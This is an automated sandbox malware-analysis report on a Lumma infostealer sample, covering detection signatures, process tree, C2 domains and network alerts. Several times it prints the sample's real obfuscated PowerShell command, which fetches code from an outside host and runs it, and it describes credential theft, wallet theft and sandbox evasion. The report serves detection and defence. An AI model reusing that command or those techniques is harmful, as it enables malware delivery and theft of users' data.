Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
MdhO83N5Fm.exe

Overview

General Information

Sample name:MdhO83N5Fm.exe
renamed because original name is a hash value
Original sample name:9fed7135d164c0fb31b859fcd5acfe5f.exe
Analysis ID:1581892
MD5:9fed7135d164c0fb31b859fcd5acfe5f
SHA1:ae768d9bbcc5d8bf4ef85797ccea78c04ff53013
SHA256:183956d90281470170a3a7799259b92bee10bafcb90ebff5d4ad937d31f70c33
Tags:exeuser-abuse_ch
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Found direct / indirect Syscall (likely to bypass EDR)
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
LummaC encrypted strings found
Query firmware table information (likely to detect VMs)
Sample or dropped binary is a compiled AutoHotkey binary
Sample uses string decryption to hide its real strings
Sigma detected: PowerShell Download and Execution Cradles
Sigma detected: Suspicious PowerShell Parameter Substring
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches for user specific document files
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: PowerShell Web Download
Sigma detected: Usage Of Web Request Commands And Cmdlets
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • MdhO83N5Fm.exe (PID: 4088 cmdline: "C:\Users\user\Desktop\MdhO83N5Fm.exe" MD5: 9FED7135D164C0FB31B859FCD5ACFE5F)
    • BitLockerToGo.exe (PID: 5284 cmdline: "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe" MD5: A64BEAB5D4516BECA4C40B25DC0C1CD8)
      • powershell.exe (PID: 2780 cmdline: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • conhost.exe (PID: 3780 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • MBL4EF1WJ27Y40L4B4G3AI.exe (PID: 1080 cmdline: "C:\Users\user\AppData\Local\Temp\MBL4EF1WJ27Y40L4B4G3AI.exe" MD5: 51F99EDDD33CC04FB0F55F873B76D907)
        • MBL4EF1WJ27Y40L4B4G3AI.tmp (PID: 4952 cmdline: "C:\Users\user\AppData\Local\Temp\is-B6SUS.tmp\MBL4EF1WJ27Y40L4B4G3AI.tmp" /SL5="$70296,7785838,845824,C:\Users\user\AppData\Local\Temp\MBL4EF1WJ27Y40L4B4G3AI.exe" MD5: F809F51E678B7F2E388F8C969EF902C8)
          • MBL4EF1WJ27Y40L4B4G3AI.exe (PID: 6776 cmdline: "C:\Users\user\AppData\Local\Temp\MBL4EF1WJ27Y40L4B4G3AI.exe" /VERYSILENT MD5: 51F99EDDD33CC04FB0F55F873B76D907)
            • MBL4EF1WJ27Y40L4B4G3AI.tmp (PID: 2428 cmdline: "C:\Users\user\AppData\Local\Temp\is-FKJO0.tmp\MBL4EF1WJ27Y40L4B4G3AI.tmp" /SL5="$A005E,7785838,845824,C:\Users\user\AppData\Local\Temp\MBL4EF1WJ27Y40L4B4G3AI.exe" /VERYSILENT MD5: F809F51E678B7F2E388F8C969EF902C8)
              • timeout.exe (PID: 6704 cmdline: "timeout" 9 MD5: 100065E21CFBBDE57CBA2838921F84D6)
                • conhost.exe (PID: 5540 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • cmd.exe (PID: 6848 cmdline: "cmd.exe" /C tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH | find /I "wrsa.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                • conhost.exe (PID: 3712 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                • tasklist.exe (PID: 6000 cmdline: tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
                • find.exe (PID: 1656 cmdline: find /I "wrsa.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
              • cmd.exe (PID: 432 cmdline: "cmd.exe" /C tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH | find /I "opssvc.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                • conhost.exe (PID: 2704 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                • tasklist.exe (PID: 3628 cmdline: tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
                • find.exe (PID: 4084 cmdline: find /I "opssvc.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
              • cmd.exe (PID: 2576 cmdline: "cmd.exe" /C tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH | find /I "avastui.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                • conhost.exe (PID: 4428 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                • tasklist.exe (PID: 4524 cmdline: tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
                • find.exe (PID: 3408 cmdline: find /I "avastui.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
              • cmd.exe (PID: 6136 cmdline: "cmd.exe" /C tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH | find /I "avgui.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                • conhost.exe (PID: 1100 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                • tasklist.exe (PID: 3568 cmdline: tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
                • find.exe (PID: 1408 cmdline: find /I "avgui.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
              • cmd.exe (PID: 6500 cmdline: "cmd.exe" /C tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH | find /I "nswscsvc.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                • conhost.exe (PID: 6616 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                • tasklist.exe (PID: 4696 cmdline: tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
                • find.exe (PID: 6396 cmdline: find /I "nswscsvc.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
              • cmd.exe (PID: 1396 cmdline: "cmd.exe" /C tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH | find /I "sophoshealth.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                • conhost.exe (PID: 6612 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                • tasklist.exe (PID: 5500 cmdline: tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
                • find.exe (PID: 6404 cmdline: find /I "sophoshealth.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
              • BrightLib.exe (PID: 6828 cmdline: "C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe" MD5: 6A8860A8150021B2D5B9BB707DE4FA37)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["effecterectz.xyz", "immureprech.biz", "deafeninggeh.biz", "simplerapplau.click", "debonairnukk.xyz", "diffuculttan.xyz"]}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000003.00000003.2408545066.000000000053C000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000000.00000003.2259303619.000000000C31A000.00000004.00001000.00020000.00000000.sdmpMsfpayloads_msf_9Metasploit Payloads - file msf.war - contentsFlorian Roth
        • 0x0:$x1: 4d5a9000030000000
        00000003.00000003.2407805185.000000000053C000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000003.00000003.2458797164.000000000053D000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            00000003.00000003.2364845669.000000000053B000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              Click to see the 9 entries

              Sigma Signatures

              System Summary

              barindex
              Sigma detected: PowerShell Download and Execution Cradles
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , CommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe", ParentImage: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe, ParentProcessId: 5284, ParentProcessName: BitLockerToGo.exe, ProcessCommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , ProcessId: 2780, ProcessName: powershell.exe
              Sigma detected: Suspicious PowerShell Parameter Substring
              Source: Process startedAuthor: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , CommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe", ParentImage: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe, ParentProcessId: 5284, ParentProcessName: BitLockerToGo.exe, ProcessCommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , ProcessId: 2780, ProcessName: powershell.exe
              Sigma detected: Change PowerShell Policies to an Insecure Level
              Source: Process startedAuthor: frack113: Data: Command: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , CommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe", ParentImage: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe, ParentProcessId: 5284, ParentProcessName: BitLockerToGo.exe, ProcessCommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , ProcessId: 2780, ProcessName: powershell.exe
              Sigma detected: PowerShell Web Download
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , CommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe", ParentImage: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe, ParentProcessId: 5284, ParentProcessName: BitLockerToGo.exe, ProcessCommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , ProcessId: 2780, ProcessName: powershell.exe
              Sigma detected: Usage Of Web Request Commands And Cmdlets
              Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , CommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe", ParentImage: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe, ParentProcessId: 5284, ParentProcessName: BitLockerToGo.exe, ProcessCommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , ProcessId: 2780, ProcessName: powershell.exe
              Sigma detected: Non Interactive PowerShell Process Spawned
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , CommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe", ParentImage: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe, ParentProcessId: 5284, ParentProcessName: BitLockerToGo.exe, ProcessCommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , ProcessId: 2780, ProcessName: powershell.exe

              Suricata Signatures

              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-29T08:55:45.724286+010020283713Unknown Traffic192.168.2.549730172.67.152.160443TCP
              2024-12-29T08:55:47.958610+010020283713Unknown Traffic192.168.2.549736172.67.152.160443TCP
              2024-12-29T08:55:50.293500+010020283713Unknown Traffic192.168.2.549742172.67.152.160443TCP
              2024-12-29T08:55:54.726682+010020283713Unknown Traffic192.168.2.549753172.67.152.160443TCP
              2024-12-29T08:55:57.103190+010020283713Unknown Traffic192.168.2.549759172.67.152.160443TCP
              2024-12-29T08:55:59.908522+010020283713Unknown Traffic192.168.2.549765172.67.152.160443TCP
              2024-12-29T08:56:04.717398+010020283713Unknown Traffic192.168.2.549776172.67.152.160443TCP
              2024-12-29T08:56:06.928220+010020283713Unknown Traffic192.168.2.549782172.67.152.160443TCP
              2024-12-29T08:56:09.928693+010020283713Unknown Traffic192.168.2.549788185.161.251.21443TCP
              2024-12-29T08:56:12.389676+010020283713Unknown Traffic192.168.2.549796172.67.208.58443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-29T08:55:46.519980+010020546531A Network Trojan was detected192.168.2.549730172.67.152.160443TCP
              2024-12-29T08:55:48.801921+010020546531A Network Trojan was detected192.168.2.549736172.67.152.160443TCP
              2024-12-29T08:56:07.759783+010020546531A Network Trojan was detected192.168.2.549782172.67.152.160443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-29T08:55:46.519980+010020498361A Network Trojan was detected192.168.2.549730172.67.152.160443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-29T08:55:48.801921+010020498121A Network Trojan was detected192.168.2.549736172.67.152.160443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-29T08:55:45.724286+010020584291Domain Observed Used for C2 Detected192.168.2.549730172.67.152.160443TCP
              2024-12-29T08:55:47.958610+010020584291Domain Observed Used for C2 Detected192.168.2.549736172.67.152.160443TCP
              2024-12-29T08:55:50.293500+010020584291Domain Observed Used for C2 Detected192.168.2.549742172.67.152.160443TCP
              2024-12-29T08:55:54.726682+010020584291Domain Observed Used for C2 Detected192.168.2.549753172.67.152.160443TCP
              2024-12-29T08:55:57.103190+010020584291Domain Observed Used for C2 Detected192.168.2.549759172.67.152.160443TCP
              2024-12-29T08:55:59.908522+010020584291Domain Observed Used for C2 Detected192.168.2.549765172.67.152.160443TCP
              2024-12-29T08:56:04.717398+010020584291Domain Observed Used for C2 Detected192.168.2.549776172.67.152.160443TCP
              2024-12-29T08:56:06.928220+010020584291Domain Observed Used for C2 Detected192.168.2.549782172.67.152.160443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-29T08:56:13.293242+010020084381A Network Trojan was detected172.67.208.58443192.168.2.549796TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-29T08:55:44.072993+010020584281Domain Observed Used for C2 Detected192.168.2.5551061.1.1.153UDP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-29T08:55:55.648772+010020480941Malware Command and Control Activity Detected192.168.2.549753172.67.152.160443TCP

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Antivirus detection for URL or domain
              Source: https://simplerapplau.click/Avira URL Cloud: Label: malware
              Source: https://cegu.shop/Avira URL Cloud: Label: malware
              Source: https://cegu.shop:443/8574262446/ph.txtelease/key4.dbPKAvira URL Cloud: Label: malware
              Source: https://klipvumisui.shop:443/int_clp_sha.txtAvira URL Cloud: Label: malware
              Source: https://klipvumisui.shop/int_clp_sha.txttAvira URL Cloud: Label: malware
              Source: https://klipvumisui.shop/lAvira URL Cloud: Label: malware
              Source: simplerapplau.clickAvira URL Cloud: Label: malware
              Source: https://simplerapplau.click/skQ&t)Avira URL Cloud: Label: malware
              Source: https://klipvumisui.shop/int_clp_sha.txtAvira URL Cloud: Label: malware
              Source: https://simplerapplau.click/apiAvira URL Cloud: Label: malware
              Source: https://simplerapplau.click/coAvira URL Cloud: Label: malware
              Source: https://simplerapplau.click/taAvira URL Cloud: Label: malware
              Source: https://simplerapplau.click/sAvira URL Cloud: Label: malware
              Source: https://simplerapplau.click/%sAvira URL Cloud: Label: malware
              Source: https://simplerapplau.click/piAvira URL Cloud: Label: malware
              Source: https://klipvumisui.shop/Avira URL Cloud: Label: malware
              Source: https://simplerapplau.click/pgRAvira URL Cloud: Label: malware
              Source: https://cegu.shop/8574262446/ph.txtAvira URL Cloud: Label: malware
              Source: https://simplerapplau.click:443/apiAvira URL Cloud: Label: malware
              Source: https://cegu.shop/8574262446/ph.txtkAvira URL Cloud: Label: malware
              Source: https://simplerapplau.click:443/apicrosoftAvira URL Cloud: Label: malware
              Source: https://simplerapplau.click/GAvira URL Cloud: Label: malware
              Found malware configuration
              Source: 0.2.MdhO83N5Fm.exe.c0de000.2.unpackMalware Configuration Extractor: LummaC {"C2 url": ["effecterectz.xyz", "immureprech.biz", "deafeninggeh.biz", "simplerapplau.click", "debonairnukk.xyz", "diffuculttan.xyz"]}
              Multi AV Scanner detection for dropped file
              Source: C:\Users\user\AppData\Local\Temp\MBL4EF1WJ27Y40L4B4G3AI.exeReversingLabs: Detection: 13%
              Multi AV Scanner detection for submitted file
              Source: MdhO83N5Fm.exeVirustotal: Detection: 14%Perma Link
              Source: MdhO83N5Fm.exeReversingLabs: Detection: 28%
              Sample uses string decryption to hide its real strings
